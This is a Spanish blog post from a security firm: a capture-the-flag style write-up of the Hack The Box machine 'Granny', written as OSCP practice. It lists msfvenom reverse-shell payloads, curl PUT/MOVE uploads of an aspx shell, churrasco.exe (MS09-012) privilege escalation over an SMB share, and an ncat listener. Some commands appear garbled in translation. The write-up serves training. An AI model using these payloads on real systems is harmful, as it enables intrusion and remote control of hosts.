Road to OSCP - Hack The Box Write Up - Granny

Blog

22
- Abril
2020
Road to OSCP - Hack The Box Write Up - Granny

Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.

En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.

¡Empecemos con la diversión!

Granny

Pasos Iniciales

El propio Nmap ha descubierto una amplia gama de métodos http arriesgados permitidos por el anfitrión.

Con el método PUT podemos subir un shell inverso aspx. Es importante añadir la extensión de el archivo, pero el servidor no nos deja ponerlo en aspx. La solución es usar el método MOVE para asignarle la extensión aspx:

IMPORTANTE: Para subir un archivo binario usando curl, necesitamos usar la bandera de datos-binarios.

  1. Crear la carga útil. msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=12345 -f aspx -o shell.aspx
  2. Cárguelo como un archivo de texto. curl -X PUT http://10.10.10.15/peng_shell.txt --data-binary @shell.aspx
  3. Asigne la extensión aspx. curl -X MOVE -H 'Destino:http://10.10.10.15/peng_shell.aspx' http://10.10.10.15/peng_shell.txt

Conseguimos una shell como: Servicio de red sin autoridad.

Root

Después de un año buscando una hazaña que funcione, MS09-012 (churrasco.exe) funciona! Después de descargarlo y "deshacerlo", lo renombramos a exploit.exe.

Para ejecutarlo en la máquina víctima necesitamos crear un recurso compartido SMB local:

  1. En Kali: Impacket-smbserver smbDir $(pwd).
  2. En la máquina víctima: 10.10.14.31 smbDir exploit.exe whoami.

Ahora podemos ejecutar comandos individuales como root, pero aún así nos gustaría tener un shell adecuado.

  1. En Kali: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.31 LPORT=6969 -f exe > shell.exe.
  2. En Kali: ncat -lnvp 6969.
  3. En la máquina de la víctima: 10.10.14.31 Dir -exploit.exe 10.10.14.31 Dir -shell.exe.

Nota: La shell tarda un poco en llegar, pero obtenemos una shell como root.

Ángel Guzmán/Evaluador Junior

Grado y Master en Ingeniería de Tecnologías de Telecomunicación por la Universidad de Granda, especializado en telématica. Se unió a jtsec en noviembre de 2019 como evaluador de ciberseguridad Junior.

Desde su unión a jtsec, ha participado en varios proyectos internos de hardware hacking y ha recibido formación sobre la certificación LINCE.

Su principal motivación es aprender, desde pequeñas herramientas para su trabajo diario hasta nuevas tecnologías.


Contacto

¡Envíanos tus dudas o sugerencias!

Al enviar tus datos nos permites que los usemos para resolver tus dudas enviándote información comercial de tu interés. Los suprimiremos cuando dejen de ser necesarios para esto. Infórmate de tus derechos en nuestra Política de Privacidad.